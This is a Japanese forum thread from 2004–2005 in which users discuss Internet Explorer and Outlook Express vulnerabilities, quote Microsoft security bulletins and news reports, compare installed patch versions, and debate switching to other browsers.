↓IEの脆弱の部分 下記のソフトで補うことが出来るんだろうか? このソフト使っている人いたら 教えてね BB de!!スマートブラウジング Ver.1
667 :
名無しさん@お腹いっぱい。 :04/02/11 21:07
668 :
名無しさん@お腹いっぱい。 :04/02/18 11:27
669 :
名無しさん@お腹いっぱい。 :04/02/18 11:34
670 :
名無しさん@お腹いっぱい。 :04/02/18 16:13
671 :
名無しさん@お腹いっぱい。 :04/02/20 20:01
672 :
名無しさん@お腹いっぱい。 :04/03/01 16:45
673 :
名無しさん@お腹いっぱい。 :04/03/04 22:01
>673 >Outlook ExpressはHTMLメールから身を守れる > MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像 >をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張 >子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。 >同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。
>>673 >ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…
>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。
676 :
名無しさん@お腹いっぱい。 :04/03/12 17:10
677 :
名無しさん@お腹いっぱい。 :04/04/03 16:48
678 :
名無しさん@お腹いっぱい。 :04/04/03 19:28
679 :
名無しさん@お腹いっぱい。 :04/04/03 21:43
いちいち右クリしなきゃならんのか…
680 :
名無しさん@お腹いっぱい。 :04/04/04 13:16
HTMLメールをテキストで表示するようにしてれば大丈夫なのではないかと…
681 :
名無しさん@お腹いっぱい。 :04/04/06 18:18
682 :
名無しさん@お腹いっぱい。 :04/04/06 19:24
>>680 それはマンドクセ・・
でも、そうしないとヤバい?
Outlook 2003はOEとちがってプレビューしても安全でしょうか?
686 :
名無しさん@お腹いっぱい。 :04/04/07 14:13
>>682 ノートンは"MHTMLRedir.Exploit"として検出するようだ。
>>682 それexploit公開されてる?
XPSP2だと発動しないのか再現に失敗してるだけなのか
確かめたいんだが
689 :
名無しさん@お腹いっぱい。 :04/04/08 11:25
690 :
名無しさん@お腹いっぱい。 :04/04/09 23:01
691 :
名無しさん@お腹いっぱい。 :04/04/09 23:07
692 :
名無しさん@お腹いっぱい。 :04/04/10 20:29
これはヤバいかも・・・
694 :
名無しさん@お腹いっぱい。 :04/04/14 11:06
695 :
名無しさん@お腹いっぱい。 :04/04/14 11:11
>>7 HTMLの表示 > テキストに変換して表示
696 :
名無しさん@お腹いっぱい。 :04/04/14 11:19
>>197 セキュリティーをするのに 無料と思ってる前提が糞でつ
697 :
名無しさん@お腹いっぱい。 :04/04/14 11:46
2年前の投稿にレスつけられてもな・・・
>>688 問題あった
そこに書かれてるのはMS03-032とMS04-013を組み合わせた
攻撃が存在するということだけで、MS03-032を利用しない
攻撃も可能
699 :
名無しさん@お腹いっぱい。 :04/04/14 12:14
パッチをあてる と アップグレードは意味ちがうのですか?
厳密にはな、まあ前後の文意から読め つーか何の話だ
>>699 パッチをあてるは文字通りその穴に対する「つぎあて」。グレードはあがらないのが普通。
702 :
名無しさん@お腹いっぱい。 :04/04/14 14:02
703 :
名無しさん@お腹いっぱい。 :04/04/20 14:05
705 :
名無しさん@お腹いっぱい。 :04/04/21 10:50
706 :
名無しさん@お腹いっぱい。 :04/04/21 22:49
セキュリティ・ホールを突くフィッシングが出現,キー・ロガーを仕掛ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040421/143365/ >今回のフィッシングが突くセキュリティ・ホールは,マイクロソフト
>が4月14日に公開したセキュリティ・ホールの一つ「MS04-013」であ
>る(関連記事)。このセキュリティ・ホールは「Outlook Expressに
>関するセキュリティ・ホール」とされているものの,正確には
>Outlook Expressに実装されている「MHTMLプロトコル・ハンドラ」の
>セキュリティ・ホールである。このため,Outlook Expressに限らず,
>Internet Explorer(IE)などで「mhtml」を含むURLにアクセスする
>場合には,このセキュリティ・ホールの影響を受ける。同社のセキュ
>リティ情報で「Outlook Expressを使っていなくても,Outlook Express
>がインストールされている環境ではパッチを適用する必要がある」と
>しているのはこのためである。つまり,「MS04-013」のパッチを適用
>していない環境において,偽のメール(フィッシング・メール)に記
>載されたリンクにIEでアクセスすると,キー・ロガーを勝手にインス
>トールされることになる。
708 :
名無しさん@お腹いっぱい。 :04/05/08 22:22
709 :
名無しさん@お腹いっぱい。 :04/05/11 14:10
711 :
名無しさん@お腹いっぱい。 :04/05/12 22:31
712 :
名無しさん@お腹いっぱい。 :04/05/13 15:56
714 :
名無しさん@お腹いっぱい。 :04/05/20 12:57
715 :
名無しさん@お腹いっぱい。 :04/05/20 16:38
716 :
名無しさん@お腹いっぱい。 :04/05/21 12:03
717 :
名無しさん@お腹いっぱい。 :04/06/02 21:40
718 :
名無しさん@お腹いっぱい。 :04/06/09 12:21
719 :
名無しさん@お腹いっぱい。 :04/06/10 09:42
721 :
名無しさん@お腹いっぱい。 :04/06/11 15:48
JustSystem Shurikenマンセー 独自ブラウザエンジンマンセー
723 :
名無しさん@お腹いっぱい。 :04/06/12 23:42
724 :
名無しさん@お腹いっぱい。 :04/06/15 12:58
725 :
名無しさん@お腹いっぱい。 :04/06/23 00:14
726 :
名無しさん@お腹いっぱい。 :04/06/24 10:51
728 :
名無しさん@お腹いっぱい。 :04/06/25 21:08
一番良いのはIEもOEも使わないことなんだが…。
>>1 の「建設的に」ってのは、「それを言うな」って意味なんだろうね?
んじゃ、勝手にすれば?
ワロタ
732 :
名無しさん@お腹いっぱい。 :04/06/30 14:31
733 :
名無しさん@お腹いっぱい。 :04/07/01 13:08
734 :
名無しさん@お腹いっぱい。 :04/07/01 15:18
>>733 ((;゚Д゚)ガクガクブルブル
おかげさまでIE(含OE)は何でもありのブラウザまで進化しました。 この状況を希望しない方はFirefox若しくはOperaをご使用下さい。
( ゚Д゚)<ポカーン
737 :
名無しさん@お腹いっぱい。 :04/07/02 12:45
これってIE3/4で一度は修正された穴でしょ。 どいつもこいつも三歩歩いたら忘れる学習能力ゼロの鳥頭ですか?
741 :
名無しさん@お腹いっぱい。 :04/07/06 19:21
744 :
名無しさん@お腹いっぱい。 :04/07/13 09:59
745 :
名無しさん@お腹いっぱい。 :04/07/13 10:19
もう良いよ。疲れたよ。 非IE系ブラウザに乗り換えます。
747 :
名無しさん@お腹いっぱい。 :04/07/14 09:09
748 :
名無しさん@お腹いっぱい。 :04/07/14 11:59
749 :
名無しさん@お腹いっぱい。 :04/07/14 22:56
》749 自動的にMozilla♪
》????????????
752 :
名無しさん@お腹いっぱい。 :04/07/29 09:40
セキュリティ・ホール 人間が作っているんだもんそんなの当たり前。 きっと完璧なコンピューターでロジックのあら捜ししたら、今見つかっている 5倍は見つかると思うよ。
754 :
名無しさん@お腹いっぱい。 :04/07/31 09:38
757 :
名無しさん@お腹いっぱい。 :04/08/17 17:39
758 :
名無しさん@お腹いっぱい。 :04/08/18 11:55
Operaだって1ヶ月に4回アドレスバー偽装が発見されたりしたじゃん
テスト結果 Internet Explorer v6.00 SP1 (6.00.2800.1106)では再現されました Mozilla/5.0 Gecko/20040803 Firefox/0.9.3では再現されず
761 :
名無しさん@お腹いっぱい。 :04/08/20 13:03
762 :
名無しさん@お腹いっぱい。 :04/08/24 15:08
763 :
名無しさん@お腹いっぱい。 :04/08/26 12:54
765 :
名無しさん@お腹いっぱい。 :04/09/02 23:44
766 :
名無しさん@お腹いっぱい。 :04/09/05 00:08
767 :
MS04-028 :04/09/15 09:10:36
===緊急===
MS04-028 - JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される (833987)
http://go.microsoft.com/?linkid=996596 概要 JPEG イメージ形式の処理に脆弱性が存在します。
影響 リモートでコードが実行される
影響を受けるソフトウェア・Windows、Office、Developer、Internet Explorer、他のソフトウェア
詳細な情報は、「影響を受けるソフトウェアおよびダウンロード先」をご確認ください。
XPのSP1だけど、Windows Updateサイトで確認してもMS04-028は出ません。 .NET Framework 1.1 Service Pack 1入れてあるからMS04-028は入れなくて もいいんだろうか? とりあえずしばらくは関連情報に注目しときます。
769 :
名無しさん@お腹いっぱい。 :04/09/15 11:55:38
770 :
名無しさん@お腹いっぱい。 :04/09/22 10:36:53
771 :
名無しさん@お腹いっぱい。 :04/09/25 22:57:30
772 :
名無しさん@お腹いっぱい。 :04/09/29 14:16:26
773 :
名無しさん@お腹いっぱい。 :04/09/30 09:37:07
初心者で申し訳ないのですが、質問させてください。 OEを使っているのですが、気付いたらアカウントの設定 (”サーバー”タブ内のSMTP欄)がいつのまにかlocal hostに変わっていました。 前はISPのSMTPサーバー名を入れてあったのに・・・。 これってどうしてでしょうか?
アンチウィルスソフトがメーラーを監視するためにlocalhostにして 中継している場合もあるよ。
777 :
名無しさん@お腹いっぱい。 :04/09/30 14:30:34
777get!!
778 :
名無しさん@お腹いっぱい。 :04/10/05 09:09:23
780 :
名無しさん@お腹いっぱい。 :04/10/13 08:54:26
781 :
名無しさん@お腹いっぱい。 :04/10/14 18:55:38
MS04-038は、なさそうだね。
783 :
名無しさん@お腹いっぱい。 :04/10/22 13:19:04
784 :
名無しさん@お腹いっぱい。 :04/10/27 23:59:12
785 :
名無しさん@お腹いっぱい。 :04/10/29 14:38:15
787 :
名無しさん@お腹いっぱい。 :04/11/02 13:30:08
788 :
名無しさん@お腹いっぱい。 :04/11/02 13:46:46
次から次へと穴が見つかるのは何故? 1.シェアが高くて注目されてるから 2.もともと設計が糞だから 3.… 他のOS用のIE6SP2もリリースすべきヽ(`Д´)ノ
>>787 このページの解説がいつも糞なのは、セキュリティソフトのシールドを有効にしていれば、
おそらく実行されるスクリプトコードに既に対応していて、ウィルスと判定してくれて実行などされないので、
全く実害が無いという事である。
790 :
名無しさん@お腹いっぱい。 :04/11/02 23:23:33
みんながセキュリティソフト入れてれば、ね。
792 :
名無しさん@お腹いっぱい。 :04/11/04 11:42:59
>>791 なんでも年齢と郵便番号を偽って登録してたそうな。
早く反省し終わって復帰キボンヌ
偽ってというか、 あんなサービスに正しい個人情報差し出す奴いるのか? しかしいきなり消すかねえ。 有名サイトなので目をつけられたのか、あからさまに偽と確定できる 住所(「〒123-45 東京都東京市東京町1-1-1」みたいな実在しない やつ)で登録してたからか。
> 住所をご登録頂いていないユーザー様には、登録情報変更ページに > て住所をご登録いただくまで、はてなをご利用頂けなくなります ああ、登録してなかったんだな。たぶん。 そうまでして個人情報吸い上げようとするか。 何か新しい商売はじめるのかね。
>>795 それは来年1月からだろう。
いま見られなくなってるのはTakagiタンが自粛してプライベートモードにしてるだけだと思われ。
あのやり方だと氏名・住所の正確性は担保されないから、
>他者の権利侵害などが行われている場合などに、仮名でユーザー登録を頂いている等の理由で書き込みを行った方の特定ができない
という理由は薄弱だよなぁ。
797 :
名無しさん@お腹いっぱい。 :04/11/05 10:39:33
IEに新たなセキュリティ・ホール,WebページやHTMLメールを開くだけで被害を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/ >デンマークSecuniaなどは11月2日,Internet Explorer(IE)6/6 SP1に
>見つかったセキュリティ・ホールを公表した。細工が施されたHTMLファイル
>(WebページやHTMLメール)を開くだけで,任意のプログラムを実行させ
>られる危険性がある。実際,セキュリティ・ホールを突くHTMLファイルが
>公開されている。IE 6に限らず,IEのコンポーネントを利用するメール・
>ソフトなども影響を受けるので要注意。なお,Windows XP SP2を適用して
>いる場合には影響を受けない。(ry
798 :
名無しさん@お腹いっぱい。 :04/11/05 11:06:17
ホント他のOS用にもIE6SP2出してほしいよ 仕方がないから会社のWin2kでのWebブラウズは 当面Firefox使うことにした
799 :
名無しさん@お腹いっぱい。 :04/11/05 13:39:52
IE6SP2(2K,ME,98用)激しくキボンヌ
NT用モナー
801 :
名無しさん@お腹いっぱい。 :04/11/05 16:02:02
>801 日経はトラッキングクッキー拒否にしているから見られないや まあいいか
>>802 /members/のページは、メンバー登録(無料)とcookieの両方必要。
805 :
名無しさん@お腹いっぱい。 :04/11/10 09:11:23
807 :
名無しさん@お腹いっぱい。 :04/11/10 16:14:45
809 :
名無しさん@お腹いっぱい。 :04/11/17 17:28:20
812 :
名無しさん@お腹いっぱい。 :04/11/27 19:47:56
813 :
名無しさん@お腹いっぱい。 :04/11/28 20:49:17
814 :
MS04-040緊急 :04/12/02 07:04:56
816 :
名無しさん@お腹いっぱい。 :04/12/02 13:36:40
ていうか889669じゃないとセキュリティ修正以外のパッチでもトラブル覚悟ですぐ当てるタイプの人には不足(889293でも穴はふさがるけど) >更新プログラム 889669 には、セキュリティ更新プログラム 889293 (MS04-040) の提供後に作成された Internet Explorer 用修正プログラムのすべてが含まれています。
819 :
816 :04/12/02 19:07:20
821 :
名無しさん@お腹いっぱい。 :04/12/07 21:57:48
もう訳わからん。
常にこのページのパッチさえ当てとけばおっけ
みたいな分かりやすい形にしてくれ。
ごちゃごちゃ読んでられん。
で、質問なんだけど、
OEってHTML形式で送られてきてもテキスト形式で表示させてる限り無問題?
俺はメールの送信者をアルファベットで表記してるんだけど、
送信者に表示されるのが日本語の名前じゃないと
怖くて開かずに削除してしまう癖があるとおっしゃる方がおられます。
海外からウィルスよく来るので。
常にテキスト形式で表示させておけばいいんじゃないかと思うのだけど。
from
SUZUKI kenji <
[email protected] >
を
鈴木賢治 <
[email protected] >
にして欲しいらしい。
ヘッダに日本語混ぜたくない。
subjectは妥協してるけど。
いや昔のサーバーとかMUAの問題からじゃなくて単に好みでそうしてるんだけど。
無問題なんて言い切れるのは神様かただの莫迦だよ だってMSだもの みつを
824 :
名無しさん@お腹いっぱい。 :04/12/08 10:55:00
>>822 無問題といいきれないが、少なくともテキスト表示にして
標準のブラウザをIE(コンポーネント使用ブラウザ含む)以外のブラウザ(FireFoxとかOperaとか)にしておけば、
かなりリスクは低減できると思う(さらにJavaScriptも無効に)。
そこまでしてOE使うなという意見もあるけど、いろんな事情で使わざるを得ない人もいるだろうから…
OE 使うのはやめとけ SP2パッチあててFirefox (Javaスクリプト無効) 導入汁 ファイアーウオールはKerio personal ファイアーウオールでMAXセキュに設定 ルーターは2重で完璧!!(要:ポート設定) アンチウイルスソフトはノートンかKasperskyA-V導入 これだけで9割不正アクセス&ウイルスに対して有効
826 :
名無しさん@お腹いっぱい。 :04/12/08 14:43:54
やっぱコンポーネントの問題は逃れられないのか。 んで、さっきIE6を アンインストール→インストールし直し したんだけど、 Windows Updateで、なぜか823559だけ何度も表示される。 適用したはずなのに、再起動してもう一度行くとまた表示される。 パッチをダウンロードして保存してから実行してもダメ。 まぁこんなこともよくあるのでしょう・・・が、 ちょっと不安なので、バージョン合ってるか見て下さい。 Ver.6.0.2800.1106 更新バージョン ; SP1 ; Q889293 ; Q837009 ; q313829 (最後のだけなぜかQが小文字) 関係ないけどこのバージョン情報って何とかコピペ出来ないんだろうか。 そもそもなぜ出来ないようにしてあるのだろうか。
書き忘れ OSは98seです。
>>825 ソフトよりユーザーの知識や意識の方が大事
>>826 このスレは初めてですが、同じ環境なので取り敢えず参考程度になれば・・・
スタート>プログラム>アクセサリ>システムツール>システム情報
のInternet Explorerを見ると、以下のようになっています。(コピーも出来ます)
バージョン 6.0.2800.1106IS
ビルド 62800.1106
プロダクト ID *****-***-*******-*****
アプリケーションのパス C:\Program Files\Internet Explorer
最終インストールの日付 16/07/24 15:56:35
言語 日本語
アクティブなプリンタ Kyocera Mita KM-2070 KX,KM163097,***.***.*.*:lp
暗号強度 128 ビット
コンテンツ アドバイザ 無効
更新バージョン ;SP1;q313829;Q822925;Q828750;Q824145;Q832894;Q837009;Q831167;Q823353;Q867801;Q833989;Q834707;Q889293;
Java VM バージョン 5.0.3810.0
IEAK インストール する
IEの更新バージョンに 823559 は見あたりませんが、「Windows Q823559 のアップデート」
というのが、「アプリケーションの追加と削除」にリストアップされています。
これは、システム情報の W98.SE の所でも見られます。
ちなみに、IE5→5.5→6とバージョンアップしてきて、IEをアンインストールしたことはありません。
>>829 有り難う御座います!参考になりました。
そうか、システム情報か・・・
> バージョン 6.0.2800.1106IS
このISってのが謎です。
↓うちのはこんな感じです。
バージョン6.0.2800.1106
ビルド62800.1106
アプリケーションのパスC:\Program Files\Internet Explorer
最終インストールの日付04/12/08 13:32:51
言語日本語
暗号強度128 ビット
コンテンツ アドバイザ無効
更新バージョン;SP1;Q889293;Q837009;q313829;
Java VM バージョン5.0.3810.0
IEAK インストールしない
831 :
名無しさん@お腹いっぱい。 :04/12/09 10:41:14
>>831 そこの
>Secuniaでは「信頼できるサイトを閲覧しているときには,信頼できないサイトを閲覧しない
>(Do not browse untrusted sites while browsing trusted sites)」ことを対策として挙げている。
の意味がいまいち分からんけど、やっぱ漏れが頭が悪いからかな?
>>832 作成者が分かってるサイトと一緒に、誰が作ってるのか分からないような変なサイト見るなって事。
835 :
KB887797 :04/12/15 12:24:01
Outlook Express 6 Sevice Pack 1 の累積的な更新プログラム(KB887797) なるものがWindowsUpdateに来ている。詳細不明。
× Sevice Pack 1 ○ Service Pack 1 逝ってきます…
>>836 ああ、835だった。834氏スマソ本当に逝ってきます。
838 :
名無しさん@お腹いっぱい。 :04/12/15 15:31:44
Outlook Express 6 Service Pack 1 用の累積的な更新プログラム (KB887797) このセキュリティに関連しない更新プログラムによって、Outlook Express のさまざまな問題が解決されます。 デスクトップに ~ というファイルが作成されるのが無くなったかも。
KB887797ぐぐっても昨日は0件だったが、今日は684件になってる(・∀・) でも、めぼしい情報はなさげ(;´Д`)
843 :
名無しさん@お腹いっぱい。 :04/12/17 08:47:05
844 :
名無しさん@お腹いっぱい。 :04/12/17 11:31:26
>>844 別のなんだー
ところで日本語KBで機械翻訳のやつはいつも決まり文句も変だよね
翻訳エンジンにお約束用語は入ってないのかと(ry
結局わかんないところは英語情報見るっちゅーねん
846 :
名無しさん@お腹いっぱい。 :04/12/19 22:54:20
>844 分割送信時のみの危険ということだな。分割送信のチェックだけまずは チェックオフを確認して、IEのSP待つとしよう。
849 :
名無しさん@お腹いっぱい。 :04/12/21 01:00:19
>848 ああ読み違えた。ありがと。当てました。
不具合をこっそりと直して知らん振りを決め込むのは、企業として何処でもやっている当たり前の行為だ。 大企業としてまず率先して情報公開に貢献してもらいたいものだ。
Microsoftはかなり貢献してると思うけど。マジで
853 :
名無しさん@お腹いっぱい。 :04/12/24 16:52:40
854 :
名無しさん@お腹いっぱい。 :04/12/24 23:36:10
安全という嘘をつくにはさらに嘘をつかねばならない。 独占企業と訴えられないようにAppleを生かしておかねばならない。
855 :
名無しさん@お腹いっぱい。 :04/12/27 12:41:21
856 :
名無しさん@お腹いっぱい。 :04/12/28 12:01:30
俺自身の脆弱性が問題だ
>>856 何でもクリックしてしまう悲しい性とか?
858 :
名無しさん@お腹いっぱい。 :04/12/28 12:32:19
正解。
┐(´ー`)┌
860 :
名無しさん@お腹いっぱい。 :05/01/05 17:08:28
>>860 IE6SP1以前はもうだめかなぁ
XP-SP2に汁(なかったらXPまともに動くPC買え)ってことか・・・
862 :
名無しさん@お腹いっぱい。 :05/01/12 12:21:53
863 :
名無しさん@お腹いっぱい。 :05/01/12 14:49:59
まさかセキュリティ情報一覧をセキュリティ情報検索(自動ですべて)と合体しちゃうとは思わなかったー 一覧画面から情報の最終更新日わかんないyo 初めて出た日付なんてどうでもいいんじゃ いっつも後から大事な情報出してくるじゃん ヴォケ− そんなに釣った魚にリソース割り当てたくないのかよ(´・ω・`)ショボーン
865 :
名無しさん@お腹いっぱい。 :05/01/18 08:54:02
>>865 そのExploit-Codeが出回る頃には、セキュリティソフトベンダーが
ウィルスとして対応するので、常駐シールドしていればそのような事にはなりませんから
見た人は勘違いしない事。
>>865-866 ベンダーが対応するまでは、怪しいサイトによく行く人は用心汁。
複数の種類のブラウザを用途によって使い分けるのも吉。
868 :
名無しさん@お腹いっぱい。 :05/01/18 21:43:41
MSセキュリティ ホーム から tp://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp MSセキュリティ情報検索(元一覧ページ) から tp://www.microsoft.com/japan/technet/security/Bulletin/MS05-003.asp (05-003はただの例) 同じところなのに大文字と小文字違いで一度飛んだリンクも紫にさせない意味わけわかめ 意味なんてないのかも???
870 :
名無しさん@お腹いっぱい。 :05/01/21 04:00:45
メーラーはOutlook以外を使う ブラウザはIE以外を使う これだけでセキュリティレベルが上がる
873 :
名無しさん@お腹いっぱい。 :05/01/28 21:47:57
876 :
名無しさん@お腹いっぱい。 :05/02/09 10:39:26
>>876 >重要: 以前に適用した修正プログラムまたは、更新プログラムのロールアップを使用している環境には、本セキュリティ更新プログラムを適用してはいけません。
>「よく寄せられる質問」をご覧いただき、適切な更新プログラムのロールアップを適用してください。
「いけません」ってめちゃx2誤解させる書き方だよな
これって結局
「電話で修正プログラム手に入れてもない&IEロールアップあてたことない香具師にはどーでもいー話だけど
関係ある環境は11月以降のIEロールアップあたってるならこのパッチだけで面倒見てやるけど
あたってない環境だとインストーラ的にアウトなんで11月(か12月)IEロールアップあててからこのパッチもあてれ」
だよね?
だったらパッチ・インストーラ作り直そうyoって思ったの漏れだけ?
ふー 大漁パッチあてやっとオワタ
フレーフレー(としかいいようがないけど)>いろんな動作(ryしなきゃ/もう始めてるよの中の人
881 :
名無しさん@お腹いっぱい。 :05/02/16 12:18:17
881のリンクじゃないや
884 :
名無しさん@お腹いっぱい。 :05/02/17 16:11:30
885 :
名無しさん@お腹いっぱい。 :05/02/22 15:20:39
886 :
名無しさん@お腹いっぱい。 :05/02/23 08:52:39
Windows Update キタ─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─!!!!!!
Double-byte character set (DBCS) characters may appear corrupted in
Internet Explorer on Windows XP when you browse a Web site that uses
Shift-JIS character encoding(KB886677)
http://support.microsoft.com/kb/886677 You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)"
in Windows XP Service Pack 2 or Windows Server 2003(KB887742)
http://support.microsoft.com/kb/887742
887 :
名無しさん@お腹いっぱい。 :05/02/23 16:54:18
たまたまとられた
890 :
名無しさん@お腹いっぱい。 :05/02/24 15:25:32
>>890 scriptだけでどうやって感染するのか書いてないな。
内容がはしょられすぎ
>>892 そんな手口いきなり詳しく書いちゃかえってまずいじゃん
>>894 どうよんでも、どこがウイルスなのかわからん。
増殖は不可能だろ?
896 :
名無しさん@お腹いっぱい。 :05/02/28 11:00:38
899 :
名無しさん@お腹いっぱい。 :05/03/07 10:41:06
902 :
名無しさん@お腹いっぱい。 :2005/03/24(木) 15:57:14
>>902-903 タイトルに[IE]〜付けるのやめたのか
あれ(これは見なくていいや)一目でわかりやすかったのにね
905 :
名無しさん@お腹いっぱい。 :皇紀2665/04/01(金) 14:18:55
907 :
名無しさん@お腹いっぱい。 :2005/04/05(火) 09:28:42
>>907 なんだかすっきりしないな。
さんざんチン●をしごかれた後に放り出されたような…
910 :
名無しさん@お腹いっぱい。 :2005/04/13(水) 13:28:42
911 :
名無しさん@お腹いっぱい。 :2005/04/13(水) 13:31:31
912 :
名無しさん@お腹いっぱい。 :2005/04/15(金) 10:51:07
深刻度格付けは確か「情報初公開時の」だったはずだから その時点では攻撃コードがないってことで「重要」になってても パッチを逆アセンブルされるのかすぐ実質「緊急」クラスに昇格することが多いな 知られてないセキュリティホールのパッチは確かに考えもんだわ そんな言い訳でもう攻撃コードあるのまで放置されそうだけどw
914 :
名無しさん@お腹いっぱい。 :2005/04/21(木) 22:37:51
>>914 そりゃそうだろうよ
おりゃ、無印のXPが発売された時に、
こりゃSP1になるまでは使い物にならないと判断して、
SP1が発売されるまで買わなかったもんね。
916 :
名無しさん@お腹いっぱい。 :2005/05/09(月) 22:41:29
917 :
名無しさん@お腹いっぱい。 :2005/05/11(水) 08:35:44
>>917 ○影響を受けるソフトウェア :
Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
※Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)
※「緊急」以外のセキュリティ問題のための更新プログラムは提供されません。
○影響を受けないソフトウェア :
Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems および Service Pack 1 を適用した Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
上記のソフトウェアのテストを行い、この脆弱性による影響を評価しました。それより前のバージョンに関してはサポートの対象となっていないため、この脆弱性による影響は不明です。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
>>919 >「従来のWindowsフォルダを使う」に設定変更して回避する
Win98,98SE,MEはパッチもないし今後は↑しかないわけだ
なんか穴が見つかって回避策するたびにちょっとずつ不便になって
最終的に知里も積もれば状態になってるような気がするのは漏れだけ?
従来のWindowsフォルダなんか不便で使えんぞ。 どうにかしてくれよな。
924 :
名無しさん@お腹いっぱい。 :2005/05/15(日) 00:53:15
925 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 11:25:16
926 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 12:40:19
928 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 13:22:29
929 :
名無しさん@お腹いっぱい。 :2005/06/06(月) 10:05:28
930 :
名無しさん@お腹いっぱい。 :2005/06/06(月) 15:04:10
ちょっと広いやうな奇ガス できれば純正メーラーで欲しいけんど… 人居ないしどうしたもんか
934 :
名無しさん@お腹いっぱい。 :2005/06/10(金) 22:50:10
936 :
名無しさん@お腹いっぱい。 :2005/06/13(月) 12:03:01
938 :
キタ━━━━━━(゚∀゚)━━━━━━ !!!!! :2005/06/15(水) 08:41:12
941 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 10:57:03
942 :
名無しさん@お腹いっぱい。 :2005/06/19(日) 15:26:22
【PC診断士】
http://pc.ai2you.com/PCshindanshi/index.asp ※無料のIDを作成する必要があります。
@ブラウザの安全度を無料診断できます。
ノートン入れてるのにセキュリティは中の下でした。
ぶっちゃけ参考になりません。誰がやっても同じ結果(低い結果)になるんじゃないの??
みんなも試してみよう!
APCのクリーン度をチェックする。
こちらの方が人気ありますね。
ウホッ!結果よろしく。
>>942 IEでActiveXを許可する時点で何でもできる環境与えているのに
安全度調査も何もないだろ。
前提条件が駄目すぎる。
クリーン度調査も、ネットでやるなよ。
レジストリからドライブの中身の調査だろ
怖くて、俺にはできん。
>>943 おっしゃるとおりで・・・w
えらく登録情報詳しく聞いてくんのね
ですね。 もっぱら僕は架空の氏名・住所の捨てIDですが。
947 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 22:20:46
948 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 10:07:24
949 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 23:24:28
>>949 >Operaは最新版の8.01では修正されている。他のブラウザは,6月21日時点でパッチは提供されていない。
ふ〜ン。
952 :
名無しさん@お腹いっぱい。 :2005/06/27(月) 10:25:18
953 :
名無しさん@お腹いっぱい。 :2005/06/27(月) 15:30:06
トップダウン方式をやめないかぎり技術の進歩とセキュリティは相反するものの ように見えるかもしれない。アクセスしようとするところに鍵を懸けず、 そこへ行く道を塞いでいる。私達の行く手を制限している。 新しい技術は、そこへ行く新しい道を作り出す。
955 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 11:45:26
956 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 09:56:55
最近outbound方向でsvchostが変なリクエストしだすと思ったら どうも自動更新がMS以外にもつなごうとするらしい (無効にするとMBSA1.2から「リスク大」判定しやがるんでめんどーだから通知だけさせとく設定にしてたのよ) WMP10もフルモードのまま起動するといろんな(音楽配信系?)とこにつなごうとするし これ新しい流行なのかな?
958 :
名無しさん@お腹いっぱい。 :2005/07/01(金) 20:41:46
959 :
名無しさん@お腹いっぱい。 :2005/07/04(月) 17:52:11
960 :
名無しさん@お腹いっぱい。 :2005/07/08(金) 19:34:40
963 :
名無しさん@お腹いっぱい。 :2005/07/12(火) 16:12:55
964 :
963 :2005/07/12(火) 16:14:22
誤:Eの 正:IEの スマソ逝ってくる…
965 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 08:31:56
967 :
966 :2005/07/13(水) 17:36:45
>966だから漏れjavaprxy.dllする回避策してるからMS05-037はしばらくスルーでいいや (近いうちにMSJVMアンインストールするつもりだしw) マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036) だけ当ててこうとインストーラ実行したら ----------------------------------------------- 注 : Microsoft Corporation またはお客様の所在 地に応じては、その子会社 (以下総称して「マイクロ ソフト」といいます) がお客様に本追加ソフトウェア を許諾するものとします。お客様は、本追加ソフトウ ェアと共に使用することを指定された Microsoft Windows ソフトウェア (以下「本ソフトウェア」と いいます) の正規に許諾された各コピーと共に、この 追加ソフトウェアを使用することができます。お客様 が本ソフトウェアの許諾を受けていない場合、本追加 ソフトウェアを使用することはできません。お客様に よる本追加ソフトウェアの使用は、本ソフトウェアに 付属する使用許諾契約書に拘束されるものとします。 EULAID:HFX_RM.0_GDR_NRL_JA ------------------------------------------ エッ!!!!!これだけ?うそーん_| ̄|○ マッマサカ (順不同) パッチ公開時点で穴がもう悪用されてる報告がMSに来てたつーから仕方なく当てましたよ ええ けど何同意してるかわかったもんじゃない つーかこんなの有効なの?
969 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 20:51:40
